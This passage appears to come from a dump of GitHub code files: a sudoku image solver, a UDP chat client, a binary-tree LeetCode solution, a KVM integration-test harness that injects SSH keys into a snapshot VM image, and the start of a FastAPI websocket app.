In[8]:\n\n\n#Question 6\n\n\n# In[12]:\n\n\nclass TestMath:\n \n def __init__(self):\n self.x = 10\n self.y = 10\n\n def test_add(self):\n \n return self.x + self.y\n \n def test_subtract(self):\n \n return self.x - self.y\n \n def test_milutiply(self):\n \n return self.x * self.y\n \nobj = TestMath()\nobj.test_add()\nobj.test_subtract()\nobj.test_milutiply()\n\n","repo_name":"siye-b/PlatinumLife-python-files","sub_path":"Round_I.py","file_name":"Round_I.py","file_ext":"py","file_size_in_byte":3368,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"33117075659","text":"\"\"\"\r\nChoose picture of sudoku to get its filled solution!\r\n\"\"\"\r\n\r\nimport sys\r\nfrom time import time\r\nfrom argparse import ArgumentParser\r\n\r\nimport numpy as np\r\nimport cv2\r\nimport matplotlib.pyplot as plt\r\nimport torch\r\nimport torchvision\r\nimport torchvision.transforms as transforms\r\n\r\n# numeric sudoku solver\r\nfrom sudokusolver import solve\r\nfrom model import MnistClassifier, MNIST_CELL_SIZE, DIGIT_CLASSIFIER_PATH\r\n\r\n\r\nAPP_NAME = \"sudoku\"\r\nSAMPLE_PATH = './images/image_0.jpg'\r\nDEFAULT_INPUT_PATH = './images/image_0.jpg'\r\nDEFAULT_OUTPUT_PATH = './images/solved_0.jpg'\r\nNORMAL_TABLE_SIZE = 1000\r\nBORDER_SIZE = 50\r\n\r\n\r\ndef load_digit_images(filepath):\r\n global DIGITS\r\n digit_model = MnistClassifier()\r\n digit_model.load_state_dict(torch.load(DIGIT_CLASSIFIER_PATH))\r\n digit_model.double()\r\n digit_model.eval()\r\n img = cv2.imread(filepath)\r\n img = cv2.cvtColor(img, cv2.COLOR_RGB2GRAY)\r\n _, tables, _ = search_tables(img)\r\n _, DIGITS = search_digits(tables[0], digit_model, return_digit_images=True)\r\n return\r\n\r\n\r\ndef search_tables(img):\r\n # binarize image\r\n img = cv2.inRange(img, 0, 100)\r\n img = cv2.dilate(img, np.ones((3,3), np.uint8), iterations=1)\r\n\r\n # find big contours and filter them to leave sudoku only\r\n contours, hierarchy = cv2.findContours(img, cv2.RETR_TREE, cv2.CHAIN_APPROX_SIMPLE)\r\n areas = [cv2.contourArea(cnt) for cnt in contours]\r\n max_contours_idx = list(np.argsort(areas)[-5:])\r\n sudoku_tables = []\r\n for cnt_idx in max_contours_idx:\r\n n_inside_contours = len(np.argwhere(hierarchy[0].T[3] == cnt_idx).reshape(-1))\r\n if n_inside_contours >= 81 - 3 and n_inside_contours <= 81 + 3:\r\n # filter points in sudoku tables to leave only 4 (?) that define a table\r\n epsilon = 0.01 * cv2.arcLength(contours[cnt_idx], True) \r\n approx_table = cv2.approxPolyDP(contours[cnt_idx], epsilon, True)\r\n if (len(approx_table) >= 4) and (len(approx_table) <= 8):\r\n sudoku_tables.append(approx_table)\r\n \r\n # try to find a sudoku table once again\r\n if len(sudoku_tables) == 0:\r\n k = 1\r\n while k < 10:\r\n cnt_idx = np.argsort(areas)[-k]\r\n epsilon = 0.01 * cv2.arcLength(contours[cnt_idx], True) \r\n approx_table = cv2.approxPolyDP(contours[cnt_idx], epsilon, True)\r\n k += 1\r\n if (len(approx_table) >= 4) and (len(approx_table) <= 20):\r\n sudoku_tables.append(approx_table)\r\n break\r\n \r\n # draw final binary mask: 1 for sudoku tables, 0 otherwise\r\n mask = np.zeros(img.shape)\r\n cv2.fillPoly(mask, sudoku_tables, color=(1, 1, 1))\r\n \r\n # rotate sudoku table to normal square table in points p1 -> (0, 0), p2 -> (R, 0), p3 -> (R, R), p4 -> (0, R)\r\n # derive points in order\r\n for idx, table in enumerate(sudoku_tables):\r\n center = table.mean(axis=0)[0]\r\n p1, p2, p3, p4 = [p[0] for p in table[np.random.choice(len(table), 4, replace=False)]]\r\n for p in table:\r\n if p[0][0] < center[0] and p[0][1] < center[1]:\r\n if p[0][0] + p[0][1] < p1[0] + p1[1]:\r\n p1 = p[0]\r\n elif p[0][0] < center[0] and p[0][1] > center[1]:\r\n p2 = p[0]\r\n elif p[0][0] > center[0] and p[0][1] < center[1]:\r\n p3 = p[0]\r\n elif p[0][0] > center[0] and p[0][1] > center[1]:\r\n if p[0][0] + p[0][1] > p4[0] + p4[1]:\r\n p4 = p[0]\r\n else:\r\n pass\r\n p = [p1, p2, p3, p4]\r\n sudoku_tables[idx] = p\r\n \r\n # final transform\r\n normal_points = np.float32([[0, 0],\r\n [0, NORMAL_TABLE_SIZE],\r\n [NORMAL_TABLE_SIZE, 0], \r\n [NORMAL_TABLE_SIZE, NORMAL_TABLE_SIZE]])\r\n for k in range(len(normal_points)):\r\n normal_points[k] = [normal_points[k][0] + BORDER_SIZE, normal_points[k][1] + BORDER_SIZE]\r\n normal_tables = []\r\n for table in sudoku_tables:\r\n transform = cv2.getPerspectiveTransform(np.float32(table), normal_points)\r\n normal_table = cv2.warpPerspective(img, transform, \r\n (NORMAL_TABLE_SIZE + 2 * BORDER_SIZE, NORMAL_TABLE_SIZE + 2 * BORDER_SIZE))\r\n normal_tables.append(normal_table)\r\n\r\n return mask, normal_tables, sudoku_tables\r\n\r\n\r\ndef search_digits_bad_table(img_table):\r\n size = img_table.shape[0] - 2 * BORDER_SIZE\r\n h = size // 10\r\n step = size // 100\r\n digit_table = [[None for _ in range(9)] for _ in range(9)]\r\n null_pad = 2\r\n null_border = np.pad(np.ones((MNIST_CELL_SIZE - 2 * null_pad, MNIST_CELL_SIZE - 2 * null_pad)), pad_width=null_pad)\r\n null_pad_cell = 10\r\n null_border_cell_10 = np.pad(np.ones((h - 2 * null_pad_cell, h - 2 * null_pad_cell)), pad_width=null_pad_cell)\r\n for i in range(9):\r\n for j in range(9):\r\n img_cell = img_table[step * i + h * i + BORDER_SIZE + step // 2 : step * i + h * (i + 1) + BORDER_SIZE + step // 2,\r\n step * j + h * j + BORDER_SIZE + step // 2 : step * j + h * (j + 1) + BORDER_SIZE + step // 2]\r\n img_cell = np.pad(img_cell * null_border_cell_10, pad_width=3)\r\n img_cell = cv2.resize(img_cell, (MNIST_CELL_SIZE, MNIST_CELL_SIZE), interpolation=cv2.INTER_AREA)\r\n digit_table[i][j] = img_cell * null_border \r\n return digit_table\r\n \r\n \r\ndef search_digits_good_table(img_table, cells):\r\n size = img_table.shape[0] - 2 * BORDER_SIZE\r\n moments = [cv2.moments(cnt) for cnt in cells]\r\n cx = [int(m['m10'] / m['m00']) for m in moments]\r\n cy = [int(m['m01'] / m['m00']) for m in moments]\r\n h = size // 10\r\n digit_table = [[None for _ in range(9)] for _ in range(9)]\r\n null_pad = 2\r\n null_border = np.pad(np.ones((MNIST_CELL_SIZE - 2 * null_pad, MNIST_CELL_SIZE - 2 * null_pad)), pad_width=null_pad)\r\n null_pad_cell = 10\r\n null_border_cell_10 = np.pad(np.ones((h - 2 * null_pad_cell, h - 2 * null_pad_cell)), pad_width=null_pad_cell)\r\n null_pad_cell = 20\r\n null_border_cell_20 = np.pad(np.ones((h - 2 * null_pad_cell, h - 2 * null_pad_cell)), pad_width=null_pad_cell)\r\n\r\n for x, y, cell in zip(cx, cy, cells):\r\n i = np.round((x - BORDER_SIZE - (size / 18)) / (size / 9)).astype(int)\r\n j = np.round((y - BORDER_SIZE - (size / 18)) / (size / 9)).astype(int)\r\n img_cell = img_table[x - h // 2 : x + h // 2, y - h // 2 : y + h // 2]\r\n \r\n if np.mean(img_cell * null_border_cell_20) > 10.:\r\n contours, hierarchy = cv2.findContours(np.uint8(img_cell * null_border_cell_10), cv2.RETR_TREE, cv2.CHAIN_APPROX_SIMPLE)\r\n areas = [cv2.contourArea(cnt) for cnt in contours]\r\n digit_idx = np.argsort(areas)[-1]\r\n y_min, x_min, ww, hh = cv2.boundingRect(contours[digit_idx])\r\n step = 2\r\n img_cell = img_table[x - h // 2 + x_min - step : x - h // 2 + x_min + hh + step,\r\n y - h // 2 + y_min - step : y - h // 2 + y_min + ww + step]\r\n img_cell = np.pad(img_cell, pad_width=15)\r\n else:\r\n img_cell = img_cell * null_border_cell_20\r\n img_cell = cv2.resize(img_cell, (MNIST_CELL_SIZE, MNIST_CELL_SIZE), interpolation=cv2.INTER_AREA)\r\n digit_table[i][j] = img_cell * null_border\r\n return digit_table\r\n\r\n \r\ndef search_digits(img_table, digit_model, return_digit_images=False):\r\n size = img_table.shape[0] - 2 * BORDER_SIZE\r\n # find big contours and filter them to leave sudoku only\r\n contours, hierarchy = cv2.findContours(img_table, cv2.RETR_TREE, cv2.CHAIN_APPROX_SIMPLE)\r\n areas = [cv2.contourArea(cnt) for cnt in contours]\r\n table_idx = np.argsort(areas)[-1]\r\n cells = np.array(contours)[np.argwhere(hierarchy[0].T[3] == table_idx).reshape(-1)]\r\n areas_cells = [cv2.contourArea(cnt) for cnt in cells]\r\n cells = cells[np.argwhere((areas_cells > np.median(areas_cells) * 0.9) & \\\r\n (areas_cells < np.median(areas_cells) * 1.1)).reshape(-1)]\r\n if len(cells) == 81:\r\n digit_table = search_digits_good_table(img_table, cells)\r\n else:\r\n digit_table = search_digits_bad_table(img_table)\r\n \r\n for i in range(9):\r\n for j in range(9):\r\n if digit_table[i][j].max() - digit_table[i][j].min() < 255.:\r\n digit_table[i][j] = np.zeros((MNIST_CELL_SIZE, MNIST_CELL_SIZE))\r\n else:\r\n digit_table[i][j] = (digit_table[i][j] - np.median(digit_table[i][j])).clip(min=0)\r\n \r\n transform = transforms.Compose(\r\n [transforms.ToTensor(),\r\n transforms.Normalize((0.5,), (0.5,))]\r\n )\r\n digit_images = {}\r\n for i in range(9):\r\n for j in range(9):\r\n img_cell = digit_table[i][j]\r\n if np.mean(img_cell) < 10.:\r\n digit_table[i][j] = -1\r\n else:\r\n img_cell = transform(img_cell / img_cell.max())[None, :]\r\n output = digit_model(img_cell)\r\n \r\n preds, digit = torch.max(output.data, 0)\r\n preds_idx = np.argsort(preds)\r\n if preds_idx[-1] == 5:\r\n if preds[6] / preds[5] > 0.5:\r\n preds_idx[-1] = 6\r\n if preds_idx[-1] == 7:\r\n if preds[1] / preds[7] > 0.5:\r\n preds_idx[-1] = 1\r\n digit_images[int(preds_idx[-1])] = digit_table[i][j]\r\n digit_table[i][j] = preds_idx[-1]\r\n\r\n digit_table = np.array(digit_table, dtype=np.int16)\r\n digit_table = np.where(digit_table == 0, 8, digit_table)\r\n if return_digit_images:\r\n return digit_table, digit_images\r\n return digit_table\r\n\r\n\r\ndef print_solution_to_table(normal_table, digit_table):\r\n sudoku_string = ''\r\n for row in digit_table:\r\n sudoku_row = ' '.join(map(str, row))\r\n sudoku_string += '\\n' + sudoku_row.replace('-1', '?')\r\n\r\n # throws exception if unsolvable in case when the given table is broken\r\n solved_table = next(solve(sudoku_string))\r\n \r\n size = normal_table.shape[0] - 2 * BORDER_SIZE\r\n h = size // 10\r\n step = size // 100\r\n for i in range(9):\r\n for j in range(9):\r\n if digit_table[i][j] == -1:\r\n solution = DIGITS[solved_table[i][j]]\r\n solution = cv2.resize(solution, (h - 2 * step, h - 2 * step), interpolation=cv2.INTER_AREA)\r\n x = step * (i + 1) + h * i + BORDER_SIZE + step // 2\r\n y = step * (j + 1) + h * j + BORDER_SIZE + step // 2\r\n normal_table[x : x + h - 2 * step, y : y + h - 2 * step] = solution\r\n return normal_table\r\n \r\n\r\ndef draw_solution(img, normal_tables, initial_points, mask):\r\n normal_points = np.float32([[0, 0],\r\n [0, NORMAL_TABLE_SIZE],\r\n [NORMAL_TABLE_SIZE, 0], \r\n [NORMAL_TABLE_SIZE, NORMAL_TABLE_SIZE]])\r\n for k in range(len(normal_points)):\r\n normal_points[k] = [normal_points[k][0] + BORDER_SIZE, normal_points[k][1] + BORDER_SIZE]\r\n result = img.copy()\r\n for k in range(len(normal_tables)):\r\n transform = cv2.getPerspectiveTransform(normal_points, np.float32(initial_points[k]))\r\n initial_table = cv2.warpPerspective(normal_tables[k], transform, img.shape[::-1])\r\n result = (result - (initial_table - initial_table.min()) * mask).clip(min=0)\r\n # make black pixels a bit brighter\r\n result[result < 10] = np.random.randint(30, 40, size=result.shape)[result < 10]\r\n result = np.uint8(result)\r\n return result\r\n\r\n \r\ndef draw(img, filepath):\r\n img = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\r\n mask, normal_tables, initial_points = search_tables(img)\r\n \r\n digit_model = MnistClassifier()\r\n digit_model.load_state_dict(torch.load(DIGIT_CLASSIFIER_PATH))\r\n digit_model.double()\r\n digit_model.eval()\r\n \r\n digits = []\r\n for k, normal_table in enumerate(normal_tables):\r\n digit_table = search_digits(normal_table, digit_model)\r\n try:\r\n normal_table = print_solution_to_table(normal_table, digit_table)\r\n except:\r\n print('Sudoku is unsolvable: unable to detect digits correctly.', file=sys.stderr)\r\n return\r\n digits.append(digit_table)\r\n normal_tables[k] = normal_table\r\n \r\n result = draw_solution(img, normal_tables, initial_points, mask)\r\n result = cv2.cvtColor(result, cv2.COLOR_GRAY2BGR)\r\n # plt.figure(dpi=150)\r\n # plt.imshow(img, cmap='gray');\r\n # plt.figure(dpi=150)\r\n # plt.imshow(result, cmap='gray');\r\n cv2.imwrite(filepath, result)\r\n return result\r\n\r\n\r\nDIGITS = {}\r\nload_digit_images(SAMPLE_PATH)\r\n\r\n\r\ndef callback(arguments):\r\n \"\"\"Callback function to process CLI commands\"\"\"\r\n start = time()\r\n image = cv2.imread(arguments.input)\r\n try:\r\n draw(image, arguments.output)\r\n except Exception as e:\r\n print(e)\r\n print(f\"Running time: {time() - start:.3f} seconds.\")\r\n\r\n\r\ndef setup_parser(parser):\r\n \"\"\"Parse commands from CLI\"\"\"\r\n parser.add_argument(\r\n \"-i\", \"--input\",\r\n default=DEFAULT_INPUT_PATH,\r\n help=\"path to input image\",\r\n )\r\n parser.add_argument(\r\n \"-o\", \"--output\",\r\n default=DEFAULT_OUTPUT_PATH,\r\n help=\"path to output image\",\r\n )\r\n parser.set_defaults(callback=callback)\r\n\r\n\r\ndef main():\r\n parser = ArgumentParser(\r\n prog=APP_NAME,\r\n description=\"make a photo of sudoku and get filled solution\",\r\n )\r\n setup_parser(parser)\r\n arguments = parser.parse_args()\r\n arguments.callback(arguments)\r\n\r\n\r\nif __name__ == \"__main__\":\r\n main()\r\n","repo_name":"oortur/sudoku-cv","sub_path":"sudoku.py","file_name":"sudoku.py","file_ext":"py","file_size_in_byte":13862,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"54"} +{"seq_id":"20480356744","text":"import sys\nimport threading\nimport time\nfrom socket import *\n\n\ndef receiver():\n global clist\n while True:\n msg, add = ClientSocket.recvfrom(65565)\n # 0:registration 1:list data 2:chat data 3:keep_alive data 4:unregistration\n op = msg.decode()[0]\n if op == \"1\":\n clist = msg.decode()[1:].split(',')\n elif op == \"2\":\n print(\"From {}\\t[{}]\".format(\n msg.decode()[1:33].strip(), msg.decode()[33:]))\n sys.stdout.flush()\n\n\ndef keep_alive():\n send = \"3\" + Client_ID + (\" \" * (32 - len(Client_ID))) + Private_IP\n while True:\n time.sleep(10)\n ClientSocket.sendto(send.encode(), (Server_IP, 10080))\n\n\ndef get_private():\n tmpsoc = socket(AF_INET, SOCK_DGRAM)\n try:\n tmpsoc.connect(('8.8.8.8', 53))\n ret = tmpsoc.getsockname()[0]\n except:\n ret = '0.0.0.0'\n tmpsoc.close()\n return ret\n\n\nif len(sys.argv) < 3:\n print(\"Error: You need 2 argument through the command line.(Client ID, Server IP)\")\n sys.exit()\n\nclist = []\nClient_ID = sys.argv[1]\nServer_IP = sys.argv[2]\nPrivate_IP = get_private()\nNAT_IP = \"\"\nClientSocket = socket(AF_INET, SOCK_DGRAM)\nClientSocket.bind(('', 10081))\nsend = \"0\" + Client_ID + (\" \" * (32 - len(Client_ID))) + Private_IP\nClientSocket.sendto(send.encode(), (Server_IP, 10080))\nth1 = threading.Thread(target=receiver)\nth1.daemon = True\nth2 = threading.Thread(target=keep_alive)\nth2.daemon = True\nth1.start()\nth2.start()\nwhile True:\n line = input()\n mode = line.split(\" \")[0]\n if mode == \"@show_list\":\n buff = \"\"\n for data in clist:\n tmp = data.split(\" \")\n buff = buff + \"{}\\t{}:{}\\n\".format(tmp[0], tmp[1], tmp[2])\n print(buff)\n sys.stdout.flush()\n elif mode == \"@chat\":\n msg = \" \".join(line.split(\" \")[2:])\n target = line.split(\" \")[1]\n for data in clist:\n tmp = data.split(\" \")\n if target == tmp[0]:\n send = \"2\" + Client_ID + (\" \" * (32 - len(Client_ID))) + msg\n if NAT_IP == \"\":\n for e in clist:\n t = e.split(\" \")\n if t[0] == Client_ID:\n NAT_IP = t[1]\n break\n if NAT_IP == tmp[1]:\n ClientSocket.sendto(send.encode(), (tmp[3], 10081))\n else:\n ClientSocket.sendto(send.encode(), (tmp[1], int(tmp[2])))\n break\n elif mode == \"@exit\":\n send = \"4\" + \"unregistration\"\n ClientSocket.sendto(send.encode(), (Server_IP, 10080))\n break\n else:\n print(\"Invalid input.\\n\")\n sys.stdout.flush()\nClientSocket.close()\n","repo_name":"KangInPark/Assignment","sub_path":"Computer Networks/A4/client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":2742,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"41964375241","text":"# Definition for a binary tree node.\n# class TreeNode(object):\n# def __init__(self, x):\n# self.val = x\n# self.left = None\n# self.right = None\n\nclass Solution(object):\n def buildTree(self, inorder, postorder):\n if len(inorder):\n val = postorder.pop()\n node = TreeNode(val)\n index = inorder.index(val)\n node.right = self.buildTree(inorder[index+1:],postorder)\n node.left = self.buildTree(inorder[0:index],postorder)\n return node\n \n","repo_name":"RahatIbnRafiq/leetcodeProblems","sub_path":"Tree/106. Construct Binary Tree from Inorder and Postorder Traversal.py","file_name":"106. Construct Binary Tree from Inorder and Postorder Traversal.py","file_ext":"py","file_size_in_byte":540,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"4137296653","text":"import logging\nimport json\nimport time\nimport os\nimport subprocess\nimport threading\nimport tempfile\nimport time\nimport paramiko\nimport pytest\nimport sys\nfrom novaclient import client\nfrom helper.sshclient import RemoteClient\nfrom . import util\n\n# Define global logger\nlogger = logging.getLogger(__name__)\nlogger.setLevel(logging.DEBUG)\n\nBIN_DIR = os.path.join(os.path.dirname(__file__), \"..\", \"..\", \"bin\")\n\nclass KVM:\n \"\"\"Handle KVM flavour\"\"\"\n\n @classmethod\n def fixture(cls, config):\n\n logger.info(\"Starting KVM integration tests.\")\n\n # We need to validate basic information\n # for 'RemoteClient' object first. Afterwards\n # we can run regular validation\n logger.info(\"Validation starting...\")\n ip = config.get(\"ip\", \"127.0.0.1\")\n logger.info(f\"Using IP {ip} to connect to VM.\")\n port = config.get(\"port\", \"2223\")\n logger.info(f\"Using port tcp/{port} to connect to VM.\")\n\n kvm = KVM(config)\n cls.kvm = kvm \n\n try:\n ssh = RemoteClient(\n host=ip,\n sshconfig=config[\"ssh\"],\n port=port,\n )\n ssh.wait_ssh()\n yield ssh\n\n finally:\n if ssh is not None:\n ssh.disconnect()\n if kvm is not None:\n kvm.__del__()\n\n @classmethod\n def instance(cls):\n return cls.kvm\n\n def __init__(self, config):\n\n # Define self.config\n self.config = config\n # Validate\n ssh_generate, arch = self._validate()\n # Create SSH\n if ssh_generate:\n self._generate_ssh_key()\n else:\n logger.info(\"Using defined SSH key for integration tests.\")\n # Adjust KVM image \n self._adjust_kvm()\n # Start KVM\n self._start_kvm(arch)\n\n\n def __del__(self):\n \"\"\" Cleanup resources held by this object \"\"\"\n if \"keep_running\" in self.config and self.config[\"keep_running\"] == True:\n logger.info(\"Keeping all resources\")\n else:\n self._stop_kvm()\n logger.info(\"Done.\")\n\n def _validate(self):\n \"\"\" Start basic config validation \"\"\"\n # Validate if .raw image is defined\n if not \"image\" in self.config:\n logger.error(\"'image' not defined. Please define path to image.\")\n else:\n logger.info(\"'image' defined. Using: {image}\".format(image=self.config[\"image\"]))\n\n # Validate if image extension is defined corretly\n allowed_image_ext = [\n \"raw\",\n \"qcow2\"\n ]\n file_name = os.path.basename(self.config[\"image\"])\n # Get extensions by dot counting in reverse order\n file_ext = file_name.split(\".\")[1:]\n # Join file extension if we have multiple ones (e.g. .tar.gz)\n file_ext = \".\".join(file_ext)\n # Fail on unsupported image types\n if not file_ext in allowed_image_ext:\n msg_err = f\"{file_ext} is not supported for this platform test type.\"\n logger.error(msg_err)\n pytest.exit(msg_err, 1)\n\n # Validate if image is already running\n pid = os.path.exists(\"/tmp/qemu.pid\")\n if pid:\n logger.warning((\"PID file is present. Probably a VM for integrationtest \"+\n \"is already running. This may cause issues for SSH key injection.\"))\n else:\n logger.info(\"No PID file found. We can adjust and start the VM.\")\n\n # Validate target arch\n if \"arch\" in self.config:\n logger.info(\"'arch' is defined. Executing for {arch}\".format(\n arch=self.config[\"arch\"]))\n arch = self.config[\"arch\"]\n else:\n # Setting amd64 as default if not defined\n logger.info(\"'arch' is not defined. Executing for amd64\")\n arch = \"amd64\"\n\n # Validate if VM should remain after tests\n if \"keep_running\" in self.config:\n if self.config[\"keep_running\"]:\n logger.info(\"'keep_running' is true. VM will remain after tests.\")\n else:\n logger.info(\"'keep_running' is false. VM will be terminated after tests.\")\n else:\n logger.info(\"'keep_running' not defined. VM will be terminated after tests.\")\n\n # Validate if SSH key should be generated (default)\n if self.config[\"ssh\"][\"ssh_key_generate\"]:\n logger.info(\"'ssh_key_generate' is true. New random SSH keys will be generated.\")\n # Validate if key files are present on filesystem\n # to avoid overwriting them\n ssh_keys = os.path.exists(self.config[\"ssh\"][\"ssh_key_filepath\"])\n if ssh_keys:\n ssh_generate = False\n logger.error((\"'ssh_key_filepath' is defined and private key is present. \" +\n \"We can NOT safely generate keys without overwriting them.\"))\n else:\n logger.info(\"'ssh_key_filepath' is not defined. We can safely generate keys.\")\n ssh_generate = True\n else:\n logger.info(\"'ssh_key_generate' is false. No SSH keys will be generated.\")\n ssh_generate = False\n\n # Validate if a SSH user is defined\n if not \"user\" in self.config[\"ssh\"]:\n user = \"root\"\n logger.info(\"'user' is not defined. Default user root will be used.\")\n else:\n user = self.config[\"ssh\"][\"user\"]\n logger.info(\"'user' is defined. Using user {user}.\".format(user=user))\n\n return ssh_generate, arch\n\n def _generate_ssh_key(self):\n \"\"\" Generate new SSH key for integration test \"\"\"\n logger.info(\"Generating new SSH key for integration tests.\")\n ssh_key_path = self.config[\"ssh\"][\"ssh_key_filepath\"]\n keyfp = RemoteClient.generate_key_pair(\n filename = ssh_key_path,\n )\n logger.info(\"SSH key for integration tests generated.\")\n\n def _adjust_kvm(self):\n \"\"\" Adjust KVM image and inject needed files \"\"\"\n logger.info(\"Adjusting KVM image. This will take some time for each command...\")\n image = self.config[\"image\"]\n image_name = os.path.basename(image)\n ssh_key_path = self.config[\"ssh\"][\"ssh_key_filepath\"]\n ssh_key = os.path.basename(ssh_key_path)\n authorized_keys_file = f\"{ssh_key_path}.pub\"\n sshd_config_src_file = \"integration/misc/sshd_config_integration_tests\"\n sshd_config_dst_file = \"/etc/ssh/sshd_config_integration_tests\"\n sshd_systemd_src_file = \"integration/misc/sshd-integration.test.service\"\n systemd_dst_path = \"/etc/systemd/system/\"\n\n # Command list for adjustments\n cmd_kvm_adj = []\n # Create a snapshot image and inject SSH key\n cmd_kvm_adj.append(\"qemu-img create -f qcow2 -F raw -b {image} /tmp/{image_name}.snapshot.img 2G\".format(\n image=image, image_name=image_name))\n cmd_kvm_adj.append(\"guestfish -a /tmp/{image_name}.snapshot.img -i mkdir /root/.ssh\".format(\n image_name=image_name))\n cmd_kvm_adj.append(\"virt-copy-in -a /tmp/{image_name}.snapshot.img {authorized_keys_file} /root/.ssh/\".format(\n image_name=image_name, authorized_keys_file=authorized_keys_file))\n cmd_kvm_adj.append(\"guestfish -a /tmp/{image_name}.snapshot.img -i mv /root/.ssh/{ssh_key}.pub /root/.ssh/test_authorized_keys\".format(\n image_name=image_name, ssh_key=ssh_key))\n cmd_kvm_adj.append(\"guestfish -a /tmp/{image_name}.snapshot.img -i chown 0 0 /root/.ssh\".format(\n image_name=image_name))\n cmd_kvm_adj.append(\"guestfish -a /tmp/{image_name}.snapshot.img -i chown 0 0 /root/.ssh/test_authorized_keys\".format(\n image_name=image_name))\n cmd_kvm_adj.append(\"guestfish -a /tmp/{image_name}.snapshot.img -i chmod 0700 /root/.ssh\".format(\n image_name=image_name))\n cmd_kvm_adj.append(\"guestfish -a /tmp/{image_name}.snapshot.img -i chmod 0600 /root/.ssh/test_authorized_keys\".format(\n image_name=image_name))\n cmd_kvm_adj.append(\"guestfish -a /tmp/{image_name}.snapshot.img -i write-append /etc/hosts.allow 'ALL: 10.\\n'\".format(\n image_name=image_name))\n # Copy custom SSHD config for executing remote integration tests\n # without changing the production sshd_config. This SSHD runs on\n # port tcp/2222\n cmd_kvm_adj.append(\"virt-copy-in -a /tmp/{image_name}.snapshot.img {sshd_systemd_src_file} {systemd_dst_path}\".format(\n image_name=image_name, sshd_systemd_src_file=sshd_systemd_src_file, systemd_dst_path=systemd_dst_path))\n cmd_kvm_adj.append(\"virt-copy-in -a /tmp/{image_name}.snapshot.img {sshd_config_src_file} /etc/ssh/\".format(\n image_name=image_name, sshd_config_src_file=sshd_config_src_file))\n cmd_kvm_adj.append(\"guestfish -a /tmp/{image_name}.snapshot.img -i chown 0 0 {sshd_config_dst_file}\".format(\n image_name=image_name, sshd_config_dst_file=sshd_config_dst_file))\n cmd_kvm_adj.append(\"guestfish -a /tmp/{image_name}.snapshot.img -i chmod 0644 {sshd_config_dst_file}\".format(\n image_name=image_name, sshd_config_dst_file=sshd_config_dst_file))\n # Create a symlink since Debian watches for type 'link'\n cmd_kvm_adj.append((\"guestfish -a /tmp/{image_name}.snapshot.img -i ln-s \".format(image_name=image_name) +\n \"{systemd_path}sshd-integration.test.service \".format(systemd_path=systemd_dst_path) +\n \"{systemd_path}multi-user.target.wants/sshd-integration.test.service\".format(\n systemd_path=systemd_dst_path)))\n\n for i in cmd_kvm_adj:\n logger.info(\"Running: {cmd}\".format(cmd=i))\n p = subprocess.run([i], shell=True, stdout=subprocess.PIPE, stderr=subprocess.STDOUT)\n rc = p.returncode\n if rc == 0:\n logger.info(\"Succeeded: {cmd}\".format(cmd=i))\n else:\n logger.error(\"Failed: {cmd}\".format(cmd=i))\n\n def _start_kvm(self, arch):\n \"\"\" Start VM in KVM for defined arch \"\"\"\n logger.info(\"Starting VM in KVM.\")\n image = self.config[\"image\"]\n image_name = os.path.basename(image)\n port = self.config[\"port\"]\n\n if arch == \"amd64\":\n cmd_kvm = \"qemu-system-x86_64 \\\n -display none \\\n -daemonize \\\n -pidfile /tmp/qemu.pid \\\n -m 1024M \\\n -device virtio-net-pci,netdev=net0,mac=02:9f:ec:22:f8:89 \\\n -netdev user,id=net0,hostfwd=tcp::{port}-:2222,hostname=garden \\\n /tmp/{image_name}.snapshot.img\".format(port=port, image_name=image_name)\n logger.info(cmd_kvm)\n p = subprocess.Popen([cmd_kvm], shell=True)\n logger.info(\"VM starting as amd64 in KVM.\")\n elif arch == \"arm64\":\n cmd_kvm = \"qemu-system-aarch64 \\\n -display none \\\n -daemonize \\\n -cpu cortex-a72 \\\n -machine virt \\\n -bios /usr/share/qemu-efi-aarch64/QEMU_EFI.fd \\\n -pidfile /tmp/qemu.pid \\\n -m 1024M \\\n -device virtio-net-pci,netdev=net0,mac=02:9f:ec:22:f8:89 \\\n -netdev user,id=net0,hostfwd=tcp::{port}-:2222,hostname=garden \\\n /tmp/{image_name}.snapshot.img\".format(port=port, image_name=image_name)\n logger.info(cmd_kvm)\n p = subprocess.Popen([cmd_kvm], shell=True)\n logger.info(\"VM starting as arm64 in KVM.\")\n else:\n logger.error(\"Unsupported architecture.\")\n\n def _stop_kvm(self):\n \"\"\" Stop VM and remove injected file \"\"\"\n logger.info(\"Stopping VM and cleaning up\")\n image = self.config[\"image\"]\n image_name = os.path.basename(image)\n p = subprocess.run(\"pkill qemu\", shell=True, stdout=subprocess.PIPE, stderr=subprocess.STDOUT)\n rc = p.returncode\n if rc == 0:\n logger.info(\"Succeeded stopping qemu\")\n if os.path.exists(\"/tmp/{image_name}.snapshot.img\".format(image_name=image_name)):\n os.remove(\"/tmp/{image_name}.snapshot.img\".format(image_name=image_name))\n else:\n logger.info(\"/tmp/{image_name}.snapshot.img does not exist\".format(image_name=image_name))\n if os.path.exists(\"/tmp/qemu.pid\"):\n os.remove(\"/tmp/qemu.pid\")\n else:\n logger.error(\"Failed stopping qemu\")\n","repo_name":"nkraetzschmar/gardenlinux_test_clone","sub_path":"tests/integration/kvm.py","file_name":"kvm.py","file_ext":"py","file_size_in_byte":12598,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"73362384803","text":"import json\nimport asyncio\nimport uvicorn\nfrom fastapi import FastAPI\nfrom fastapi import Request\nfrom fastapi import WebSocket\nfrom fastapi.templating import Jinja2Templates\nfrom pydantic import BaseModel\n\napp = FastAPI()\ntemplates = Jinja2Templates(directory=\"templates\")\n\nclass ToDoRequest(BaseModel):\n task: str\n\nmarks = [\"se\", ]\n# with open('measurements.json', 'r') as file:\n # measurements = iter(json.loads(file.read()))\n@app.post(\"/set\")\ndef set_values(value:ToDoRequest):\n marks.append(value.task)\n return value\n\n\n@app.get(\"/\")\ndef read_root(request: Request):\n return templates.TemplateResponse(\"index.html\", {\"request\": request})\n\n\n@app.websocket(\"/ws\")\nasync def websocket_endpoint(websocket: WebSocket):\n await websocket.accept()\n while True:\n await asyncio.sleep(0.1)\n if len(marks) > 0:\n payload = next(iter(marks))\n print(payload, 